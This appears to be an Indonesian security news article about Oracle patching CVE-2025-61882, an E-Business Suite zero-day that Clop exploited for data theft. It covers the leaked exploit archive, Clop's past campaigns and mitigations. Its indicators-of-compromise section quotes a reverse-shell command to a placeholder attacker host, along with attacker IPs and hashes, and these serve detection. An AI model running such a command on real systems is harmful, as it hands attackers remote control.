Oracle Tambal Zero-Day Kritis di E-Business Suite yang Dieksploitasi dalam Serangan Data Theft Clop

Oracle merilis pembaruan darurat untuk menambal kerentanan zero-day kritis (CVE-2025-61882) di Oracle E-Business Suite (EBS) yang dieksploitasi oleh kelompok ransomware Clop dalam serangan pencurian data berskala besar pada Agustus 2025.
Kerentanan Kritis Tanpa Autentikasi
Celah ini berada pada komponen Oracle Concurrent Processing (BI Publisher Integration) di EBS versi 12.2.3 hingga 12.2.14, dan memiliki skor CVSS 9.8 — menandakan tingkat keparahan tertinggi.
Kerentanan memungkinkan Remote Code Execution (RCE) tanpa autentikasi, artinya penyerang dapat mengeksekusi perintah jarak jauh tanpa memerlukan nama pengguna maupun kata sandi.
“Celah ini dapat dieksploitasi melalui jaringan tanpa autentikasi dan memungkinkan penyerang menjalankan kode berbahaya di sistem target,” tulis Oracle dalam security alert terbarunya.
Untuk menginstal tambalan ini, pelanggan wajib lebih dahulu menerapkan Critical Patch Update (CPU) Oktober 2023, sebelum memperbarui ke versi terbaru yang menutup CVE-2025-61882.

Dikaitkan Langsung dengan Kampanye Clop
Konfirmasi eksploitasi datang dari Charles Carmakal, CTO Mandiant (Google Cloud), yang menyebut bahwa Clop memanfaatkan beberapa celah EBS, termasuk CVE-2025-61882, untuk mencuri data dari sejumlah organisasi.
Serangan tersebut berlangsung pada Agustus 2025, bersamaan dengan kampanye pemerasan baru Clop yang mengirimkan email ancaman kepada korban:
“Kami telah membobol aplikasi Oracle E-Business Suite Anda dan menyalin banyak dokumen. Semua file dan informasi pribadi kini berada di server kami,” tulis Clop dalam pesan yang dibagikan ke media.
Oracle kemudian merilis Indicators of Compromise (IOCs) yang menegaskan hubungan langsung antara exploit yang digunakan Clop dan file yang bocor oleh grup Scattered Lapsus$ Hunters di Telegram.

Eksploit Bocor ke Publik
Grup Scattered Lapsus$ Hunters — gabungan penyerang dari Scattered Spider, Lapsus$, dan ShinyHunters — membagikan arsip berjudul:
oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
Isi arsip tersebut mencakup:
- exp.py – skrip eksploitasi untuk menjalankan perintah arbitrer.
- server.py – skrip pembuka reverse shell ke server penyerang.
- readme.md – instruksi penggunaan eksploit.
Oracle memastikan arsip ini adalah eksploit yang sama digunakan Clop dalam serangan EBS.
Indikator Kompromi (IOC) yang Diterbitkan Oracle
Oracle merilis rincian teknis berikut untuk membantu deteksi:
- IP terlibat:
200[.]107[.]207[.]26
185[.]181[.]60[.]11
- Perintah eksploit:
sh -c /bin/bash -i >& /dev/tcp/<ip_attacker>/0>&1
- Hash file exploit:
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
Pola Serangan Clop yang Berulang
Clop dikenal sebagai salah satu kelompok yang secara konsisten mengeksploitasi zero-day dalam kampanye pencurian data besar, termasuk:
- 2020: Accellion FTA – hampir 100 organisasi terdampak.
- 2021: SolarWinds Serv-U FTP.
- 2023: GoAnywhere MFT dan MOVEit Transfer – lebih dari 2.700 organisasi diretas.
- 2024: Dua zero-day Cleo MFT (CVE-2024-50623 & CVE-2024-55956).
Serangan terhadap Oracle EBS kini menjadi bab terbaru dalam deretan panjang eksploitasi zero-day oleh Clop.
Tindakan Mitigasi
Oracle dan pakar keamanan menyarankan langkah berikut:
- Segera instal tambalan keamanan terbaru setelah CPU Oktober 2023.
- Blokir akses eksternal ke endpoint EBS yang menggunakan komponen BI Publisher Integration.
- Periksa log jaringan dan aplikasi untuk aktivitas dari IP atau hash di atas.
- Pantau sistem untuk tanda-tanda reverse shell dan aktivitas tak sah dari akun Oracle EBS.
- Gunakan WAF dan segmentasi jaringan untuk membatasi eksposur antarmuka web Oracle.
Serangan ini mempertegas risiko tinggi pada sistem ERP dan aplikasi enterprise yang belum ditambal — sekaligus menyoroti pentingnya kontrol keamanan berlapis dalam melindungi data bisnis bernilai tinggi.
Sumber: BleepingComputer